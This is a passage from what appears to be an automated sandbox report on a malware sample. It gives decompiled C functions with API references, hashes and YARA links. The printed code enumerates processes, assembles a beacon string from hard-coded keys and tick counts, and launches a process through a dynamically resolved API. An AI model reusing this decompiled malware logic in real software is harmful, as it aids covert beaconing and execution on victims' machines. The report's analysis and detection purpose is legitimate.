						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00e85149
0x00e85153
0x00e85157
0x00e85161
0x00e85192
0x00e85168
0x00e8516d
0x00e8517a
0x00e85183
0x00e8519a
0x00e85185
0x00e8518d
0x00000000
0x00e8518d
0x00e8519b
0x00e8519c
0x00000000
0x00e8519c
0x00000000
0x00e85196
0x00e851a2
0x00e851a7

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E8514E
Process32First.KERNEL32(00000000,?), ref: 00E85161
Process32Next.KERNEL32(00000000,?), ref: 00E8518D
CloseHandle.KERNEL32(00000000), ref: 00E8519C

Strings

0, xrefs: 00E8513E

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: 0
API String ID: 420147892-4015486719
Opcode ID: fcfe56e6a5e89ebeac374a88bc3669ddbb2356e3d678060462fcba516bd0a744
Instruction ID: 9d70d67cc293c9ddcac140daa04d0bd60e34e45d84ff1b944122a643123209bb
Opcode Fuzzy Hash: fcfe56e6a5e89ebeac374a88bc3669ddbb2356e3d678060462fcba516bd0a744
Instruction Fuzzy Hash: 73F02B73202824AADB61B7668C4DFEB73ECDBC4300F041062F94DF2001EE308D4687A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E86EFC, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00E86EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0xe8a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xe8a018; // 0x87badb99
					asm("bswap eax");
					_t32 =  *0xe8a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xe8a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xe8a00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0xe8a2d4; // 0x460d5a8
					_t2 = _t35 + 0xe8b613; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0xe8a02c,  *0xe8a004, _t110);
					_t38 = E00E86A09();
					_t39 =  *0xe8a2d4; // 0x460d5a8
					_t3 = _t39 + 0xe8b653; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xe8a2d4; // 0x460d5a8
						_t7 = _t92 + 0xe8b65e; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00E85040(_t99);
					_t44 =  *0xe8a2d4; // 0x460d5a8
					_t9 = _t44 + 0xe8b302; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xe8a2d4; // 0x460d5a8
					_t11 = _t48 + 0xe8b2d7; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xe8a32c; // 0x54995b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xe8a2d4; // 0x460d5a8
						_t13 = _t88 + 0xe8b676; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xe8a37c; // 0x5499630
					_a28 = E00E82885(0xe8a00a, _t105 + 4);
					_t55 =  *0xe8a31c; // 0x54995e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xe8a2d4; // 0x460d5a8
						_t16 = _t84 + 0xe8b8da; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xe8a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xe8a2d4; // 0x460d5a8
						_t18 = _t81 + 0xe8b8b1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xe8a290, _t107, 0x800);
						if(_t98 != _t107) {
							E00E82DD0(GetTickCount());
							_t62 =  *0xe8a37c; // 0x5499630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0xe8a37c; // 0x5499630
							__imp__(_t66 + 0x40);
							_t68 =  *0xe8a37c; // 0x5499630
							_t115 = E00E8624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0xe892ac);
								_push(_t115);
								_t108 = E00E821C1();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00E81032(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00E81492();
									}
									HeapFree( *0xe8a290, 0, _v24);
								}
								HeapFree( *0xe8a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0xe8a290, _t107, _t98);
						}
						HeapFree( *0xe8a290, _t107, _a20);
					}
					HeapFree( *0xe8a290, _t107, _t117);
				}
				_t27 =  &_v16; // 0xe86020
				return  *_t27;
			}

0x00e86efc
0x00e86f10
0x00e86f12
0x00e86f20
0x00e86f24
0x00e86f2c
0x00e86f34
0x00e86f34
0x00e86f36
0x00e86f42
0x00e86f51
0x00e86f56
0x00e86f59
0x00e86f5e
0x00e86f61
0x00e86f66
0x00e86f69
0x00e86f75
0x00e86f82
0x00e86f84
0x00e86f8a
0x00e86f8f
0x00e86f9a
0x00e86f9c
0x00e86f9f
0x00e86fa5
0x00e86fa7
0x00e86fb0
0x00e86fbb
0x00e86fbd
0x00e86fc0
0x00e86fc0
0x00e86fc2
0x00e86fc9
0x00e86fce
0x00e86fdb
0x00e86fdd
0x00e86fe2
0x00e86ff0
0x00e86ff2
0x00e86ff7
0x00e86ffc
0x00e86fff
0x00e87004
0x00e8700f
0x00e87011
0x00e87014
0x00e87014
0x00e87016
0x00e87029
0x00e8702d
0x00e87032
0x00e87036
0x00e87039
0x00e8703e
0x00e87049
0x00e8704b
0x00e8704e
0x00e8704e
0x00e87050
0x00e87057
0x00e8705a
0x00e8705f
0x00e87069
0x00e8706b
0x00e87072
0x00e8708a
0x00e8708e
0x00e8709a
0x00e8709f
0x00e870a8
0x00e870b9
0x00e870bd
0x00e870c6
0x00e870cc
0x00e870d9
0x00e870e6
0x00e870ec
0x00e870f4
0x00e870fa
0x00e87100
0x00e87104
0x00e87108
0x00e8710e
0x00e87112
0x00e87119
0x00e87120
0x00e87124
0x00e8712f
0x00e87136
0x00e8713a
0x00e87143
0x00e87143
0x00e87154
0x00e87154
0x00e87163
0x00e87169
0x00e87169
0x00e87173
0x00e87173
0x00e87184
0x00e87184
0x00e87192
0x00e87192
0x00e87198
0x00e871a2

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00E86F1A
GetTickCount.KERNEL32 ref: 00E86F2E
wsprintfA.USER32 ref: 00E86F7D
wsprintfA.USER32 ref: 00E86F9A
wsprintfA.USER32 ref: 00E86FBB
wsprintfA.USER32 ref: 00E86FD9
wsprintfA.USER32 ref: 00E86FEE
wsprintfA.USER32 ref: 00E8700F
wsprintfA.USER32 ref: 00E87049
wsprintfA.USER32 ref: 00E87069
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00E87084
GetTickCount.KERNEL32 ref: 00E87094
RtlEnterCriticalSection.NTDLL(054995F0), ref: 00E870A8
RtlLeaveCriticalSection.NTDLL(054995F0), ref: 00E870C6

Part of subcall function 00E8624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00E870D9,00000000,05499630), ref: 00E86278
Part of subcall function 00E8624D: lstrlen.KERNEL32(00000000,?,00000000,00E870D9,00000000,05499630), ref: 00E86280
Part of subcall function 00E8624D: strcpy.NTDLL ref: 00E86297
Part of subcall function 00E8624D: lstrcat.KERNEL32(00000000,00000000), ref: 00E862A2
Part of subcall function 00E8624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00E870D9,?,00000000,00E870D9,00000000,05499630), ref: 00E862BF

StrTrimA.SHLWAPI(00000000,00E892AC,00000000,05499630), ref: 00E870F4

Part of subcall function 00E821C1: lstrlen.KERNEL32(054987FA,00000000,00000000,00000000,00E87100,00000000), ref: 00E821D1
Part of subcall function 00E821C1: lstrlen.KERNEL32(?), ref: 00E821D9
Part of subcall function 00E821C1: lstrcpy.KERNEL32(00000000,054987FA), ref: 00E821ED
Part of subcall function 00E821C1: lstrcat.KERNEL32(00000000,?), ref: 00E821F8

lstrcpy.KERNEL32(00000000,?), ref: 00E87112
lstrcat.KERNEL32(00000000,00000000), ref: 00E87120
lstrcat.KERNEL32(00000000,00000000), ref: 00E87124
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00E87154
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00E87163
HeapFree.KERNEL32(00000000,00000000,00000000,05499630), ref: 00E87173
HeapFree.KERNEL32(00000000,?), ref: 00E87184
HeapFree.KERNEL32(00000000,00000000), ref: 00E87192

Strings

`, xrefs: 00E87198

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID: `
API String ID: 1837416118-1224132033
Opcode ID: 80388ec6125b0492b9050fd1e853a1cb7688642b6e6075a7b02d0a55e493e1c1
Instruction ID: 4eeba5c75a1557de1035e56394a955ab6dee89203e8c6021c939b933ceb7dccb
Opcode Fuzzy Hash: 80388ec6125b0492b9050fd1e853a1cb7688642b6e6075a7b02d0a55e493e1c1
Instruction Fuzzy Hash: C4717271500205AFD722EBAADC48E6B77EDEB48310B1D0526F54DF7231E639E8099B62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4296, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1E4363
DName::operator+.LIBCMT ref: 6E1E43A0
DName::DName.LIBVCRUNTIME ref: 6E1E43B4
DName::operator+.LIBCMT ref: 6E1E43C3
DName::operator+.LIBCMT ref: 6E1E4451
DName::operator|=.LIBCMT ref: 6E1E446D
DName::DName.LIBVCRUNTIME ref: 6E1E4479
DName::operator+.LIBCMT ref: 6E1E4487
DName::operator+.LIBCMT ref: 6E1E44C1
DName::operator+.LIBCMT ref: 6E1E4502
UnDecorator::getReturnType.LIBCMT ref: 6E1E4532
operator+.LIBVCRUNTIME ref: 6E1E463F

Strings

), xrefs: 6E1E42CC

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID: )
API String ID: 1186856153-2427484129
Opcode ID: 3dc7f93b7b14526c9ef847c74ef840eb22e6344a49d8db48730dc9485ad4efb1
Instruction ID: d7bb7d80f62beadf1a81a0014ee68ec60d9fad5ed4b4c89ebe72d5ee059a2ccf
Opcode Fuzzy Hash: 3dc7f93b7b14526c9ef847c74ef840eb22e6344a49d8db48730dc9485ad4efb1
Instruction Fuzzy Hash: D1C1A7B5A00A09AFDB04CFD4D495EED77B9AF19314F144469F112EBA80EF309AC6DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5561, Relevance: 19.8, APIs: 13, Instructions: 301COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1E55CC
DName::operator+.LIBCMT ref: 6E1E5702

Part of subcall function 6E1E148F: shared_ptr.LIBCMT ref: 6E1E14AB

DName::operator+.LIBCMT ref: 6E1E574E
DName::operator+.LIBCMT ref: 6E1E575D
DName::operator+.LIBCMT ref: 6E1E56B8

Part of subcall function 6E1E6CAB: DName::operator=.LIBVCRUNTIME ref: 6E1E6D3A

DName::operator+.LIBCMT ref: 6E1E588A
DName::operator=.LIBVCRUNTIME ref: 6E1E58CA
DName::DName.LIBVCRUNTIME ref: 6E1E58E2
DName::operator+.LIBCMT ref: 6E1E58F1
DName::operator+.LIBCMT ref: 6E1E58FD

Part of subcall function 6E1E6CAB: Replicator::operator[].LIBVCRUNTIME ref: 6E1E6CE8

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID:
API String ID: 1026175760-0
Opcode ID: d46f4da1e40e1f2425eb69a5d05f87940a761a578054a4a7c4753b14e65c923e
Instruction ID: b8af5b17ae8bfd83474e19b175ad6725666311aaead8c5da53fcf98a8419f21c
Opcode Fuzzy Hash: d46f4da1e40e1f2425eb69a5d05f87940a761a578054a4a7c4753b14e65c923e
Instruction Fuzzy Hash: E7C1C071A00A089FDB14CFE4D855BEEB7F9AF19304F10445DF256ABA80EB359AC4DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E207C68, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E207CAC

Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E2092D8
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E2092EA
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E2092FC
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E20930E
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E209320
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E209332
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E209344
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E209356
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E209368
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E20937A
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E20938C
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E20939E
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E2093B0

_free.LIBCMT ref: 6E207CA1

Part of subcall function 6E1FD7F5: HeapFree.KERNEL32(00000000,00000000,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?), ref: 6E1FD80B
Part of subcall function 6E1FD7F5: GetLastError.KERNEL32(?,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?,?), ref: 6E1FD81D

_free.LIBCMT ref: 6E207CC3
_free.LIBCMT ref: 6E207CD8
_free.LIBCMT ref: 6E207CE3
_free.LIBCMT ref: 6E207D05
_free.LIBCMT ref: 6E207D18
_free.LIBCMT ref: 6E207D26
_free.LIBCMT ref: 6E207D31
_free.LIBCMT ref: 6E207D69
_free.LIBCMT ref: 6E207D70
_free.LIBCMT ref: 6E207D8D
_free.LIBCMT ref: 6E207DA5

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: c613bf2713e048f3786a82c4d14eddb9531f6bf4f2daf852a6f4c9da8325e370
Instruction ID: c769d6f7c6b128944bbcf8cbc7d606c4e5266bcc0a22000beda2c567cd443e5c
Opcode Fuzzy Hash: c613bf2713e048f3786a82c4d14eddb9531f6bf4f2daf852a6f4c9da8325e370
Instruction Fuzzy Hash: 7831503190470ADFE761AAB8DC54BAA73FAEF40319F104969E055DB1D0EF70E982DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DFE7A, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6E1DFF75
type_info::operator==.LIBVCRUNTIME ref: 6E1DFF9C
___TypeMatch.LIBVCRUNTIME ref: 6E1E00A8
CatchIt.LIBVCRUNTIME ref: 6E1E00FD
IsInExceptionSpec.LIBVCRUNTIME ref: 6E1E0183
_UnwindNestedFrames.LIBCMT ref: 6E1E020A
CallUnexpected.LIBVCRUNTIME ref: 6E1E0225

Strings

csm, xrefs: 6E1DFF22
csm, xrefs: 6E1DFFD3
csm, xrefs: 6E1DFEB5

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: 5e20de7fded70ced41c9ff577a79f5acc865cf00b467caca7395f48ed9f802e6
Instruction ID: edd9575ab1677daada76e9ed864a59935687f23a9de2ddbbcbb167fb70292892
Opcode Fuzzy Hash: 5e20de7fded70ced41c9ff577a79f5acc865cf00b467caca7395f48ed9f802e6
Instruction Fuzzy Hash: 53C1AB7280060ADFCF05CFE4C8809DEBBB9BF18314F20445AF8256B655EB71DA95EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E851A8, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00E851A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t71 =  *((intOrPtr*)(__eax + 0x14));
				_t39 = E00E84F5A(__ecx,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x14)) + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E00E877A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0xe8a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0xe8a2d4; // 0x460d5a8
					_t18 = _t50 + 0xe8b4a3; // 0x73797325
					_t52 = E00E86343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0xe8a2d4; // 0x460d5a8
						_t20 = _t53 + 0xe8b770; // 0x5498d18
						_t21 = _t53 + 0xe8b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xe8a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E00E850CA(_t76);
				goto L12;
			}

0x00e851b1
0x00e851bf
0x00e851c8
0x00e851cb
0x00e852dd
0x00e852e4
0x00e852e4
0x00e851da
0x00e851e2
0x00e851e7
0x00e851ea
0x00e851ff
0x00e85205
0x00e85206
0x00e85209
0x00e8520f
0x00e85212
0x00e85217
0x00e8521f
0x00e85226
0x00e8522d
0x00e85230
0x00e852c4
0x00e85236
0x00e85236
0x00e8523b
0x00e85242
0x00e85256
0x00e8525a
0x00e852ab
0x00e8525c
0x00e8525c
0x00e85263
0x00e8526a
0x00e85282
0x00e85288
0x00e8528c
0x00e852a6
0x00e8528e
0x00e85297
0x00e8529c
0x00e8529c
0x00e8528c
0x00e852bc
0x00e852bc
0x00e85230
0x00e852cb
0x00e852d4
0x00e852d8
0x00000000

APIs

Part of subcall function 00E84F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,00E851C4,?,?,?,?,00000000,00000000), ref: 00E84F7F
Part of subcall function 00E84F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00E84FA1
Part of subcall function 00E84F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00E84FB7
Part of subcall function 00E84F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00E84FCD
Part of subcall function 00E84F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00E84FE3
Part of subcall function 00E84F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00E84FF9

memset.NTDLL ref: 00E85212

Part of subcall function 00E86343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00E8522B,73797325), ref: 00E86354
Part of subcall function 00E86343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00E8636E

GetModuleHandleA.KERNEL32(4E52454B,05498D18,73797325), ref: 00E85249
GetProcAddress.KERNEL32(00000000), ref: 00E85250
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00E8526A
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00E85288
CloseHandle.KERNEL32(00000000), ref: 00E85297
CloseHandle.KERNEL32(?), ref: 00E8529C
GetLastError.KERNEL32 ref: 00E852A0
HeapFree.KERNEL32(00000000,?), ref: 00E852BC

Strings

0, xrefs: 00E851A8

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID: 0
API String ID: 91923200-4015486719
Opcode ID: a3b0f6253640bd67ec570b701b486f0d77bfdb0162f5c7353777d699a5f8d343
Instruction ID: 426b85ffeac8a43eb00cfa74df848f485da2dd0d37de6cbc38ccb88a64bb3451
Opcode Fuzzy Hash: a3b0f6253640bd67ec570b701b486f0d77bfdb0162f5c7353777d699a5f8d343
Instruction Fuzzy Hash: 66315972900619EFCB11ABE5CC489EEBBB8EF08304F144062F10DB3121DB35AA45DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6053, Relevance: 15.3, APIs: 10, Instructions: 253COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1E611F
UnDecorator::getSignedDimension.LIBCMT ref: 6E1E612A
DName::DName.LIBVCRUNTIME ref: 6E1E613B
UnDecorator::getSignedDimension.LIBCMT ref: 6E1E61E0
UnDecorator::getSignedDimension.LIBCMT ref: 6E1E61FD
UnDecorator::getSignedDimension.LIBCMT ref: 6E1E621A
DName::operator+.LIBCMT ref: 6E1E622F
UnDecorator::getSignedDimension.LIBCMT ref: 6E1E6252
swprintf.LIBCMT ref: 6E1E62C3
DName::operator+.LIBCMT ref: 6E1E631A

Part of subcall function 6E1E41AA: DName::DName.LIBVCRUNTIME ref: 6E1E41CE

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
String ID:
API String ID: 3689813335-0
Opcode ID: 20c36f88d879a3884e178faf6edd3f969add989e706c028a7115620c5a04decf
Instruction ID: 9f80434696c6076b008f80c4af2838f4f9241b7c8b179dc5ddc4b75289d7681c
Opcode Fuzzy Hash: 20c36f88d879a3884e178faf6edd3f969add989e706c028a7115620c5a04decf
Instruction Fuzzy Hash: B881C572D60A0E9EEB04DBE4C859BFE777C9F11304F904419F31167981DB685AC8EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FDB64, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1FDB7A

Part of subcall function 6E1FD7F5: HeapFree.KERNEL32(00000000,00000000,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?), ref: 6E1FD80B
Part of subcall function 6E1FD7F5: GetLastError.KERNEL32(?,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?,?), ref: 6E1FD81D

_free.LIBCMT ref: 6E1FDB86
_free.LIBCMT ref: 6E1FDB91
_free.LIBCMT ref: 6E1FDB9C
_free.LIBCMT ref: 6E1FDBA7
_free.LIBCMT ref: 6E1FDBB2
_free.LIBCMT ref: 6E1FDBBD
_free.LIBCMT ref: 6E1FDBC8
_free.LIBCMT ref: 6E1FDBD3
_free.LIBCMT ref: 6E1FDBE1

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1dff243b997056973e39791b19b1578c8135da16290e901f91df44e41e2751c2
Instruction ID: a46f3d573bc91210f5b0f86a94130f0815f95bc7693e0ad68348373d7dd9b29b
Opcode Fuzzy Hash: 1dff243b997056973e39791b19b1578c8135da16290e901f91df44e41e2751c2
Instruction Fuzzy Hash: 3321677A900108EFCB52DFD8C881EED7BF9BF09254B0146A5E5159F121EB31DA969FC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FCD90, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E1FD16D

Strings

f, xrefs: 6E1FCE97
p, xrefs: 6E1FCE9E
p, xrefs: 6E1FCEE4
:, xrefs: 6E1FCE52
f, xrefs: 6E1FCEDD
f, xrefs: 6E1FCE7B
p, xrefs: 6E1FCE82

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: __aulldvrm
String ID: :$f$f$f$p$p$p
API String ID: 1302938615-1434680307
Opcode ID: be54df79fc66e815870b650d95b9d55bf20b029bb029cf61353e51e1e67c13bc
Instruction ID: 61dd78eb6057177ae2ce9c96c5d1287209f807346049425910275205b4b88f09
Opcode Fuzzy Hash: be54df79fc66e815870b650d95b9d55bf20b029bb029cf61353e51e1e67c13bc
Instruction Fuzzy Hash: A402A175A0421ACAEF208FE5C8647EDB7F2FB41714FA44516E214BB284D7304DC6AF92

Uniqueness

Uniqueness Score: -1.00%

Function 00E85927, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00E85927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
